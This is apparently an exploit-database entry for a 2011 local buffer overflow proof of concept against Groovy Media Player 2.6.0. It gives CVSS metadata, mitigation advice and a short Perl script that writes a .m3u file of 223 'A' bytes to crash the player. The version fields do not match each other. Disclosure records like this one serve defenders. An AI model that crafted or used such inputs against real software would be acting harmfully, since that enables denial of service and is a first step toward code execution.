Groovy Media Player Version 2.6.0 (.m3u) Local Buffer Overflow PoC

vendor:

Groovy Media Player

by:

D3r K0n!G

7.8

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Groovy Media Player

Affected Version From: 2.6.2000

Affected Version To: 2.6.2000

Patch Exists: Yes

Related CWE: N/A

CPE: a:bestwebsharing:groovy_media_player

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Windows XP SP3

2011

Groovy Media Player Version 2.6.0 (.m3u) Local Buffer Overflow PoC

Groovy Media Player Version 2.6.0 is vulnerable to a local buffer overflow vulnerability. By creating a specially crafted .m3u file with 223 A's, an attacker can cause a buffer overflow and crash the application.

Mitigation:

Update to the latest version of Groovy Media Player.

Source

Exploit-DB raw data:

#!/usr/bin/perl
#####################################################################################
# Exploit Title: Groovy Media Player Version 2.6.0 (.m3u) Local Buffer Overflow PoC
# Date: 26/08/2011
# Author: D3r K0n!G
# Software Link: http://www.bestwebsharing.com/groovy-media-player                  
# Category: Local Buffer Overflow PoC
# Version: 2.6.0
# Tested on: Windows XP SP3
# CVE: N/A
#####################################################################################
#####################################################################################
#!/bin/usr/ZL4b!4
#####################################################################################
my $file = "groovymp.m3u";
my $junk = "\x41" x 223;
open($FILE,">$file");
print $FILE $junk;
print "\nCrash.m3u file created successfully\n";
close($FILE);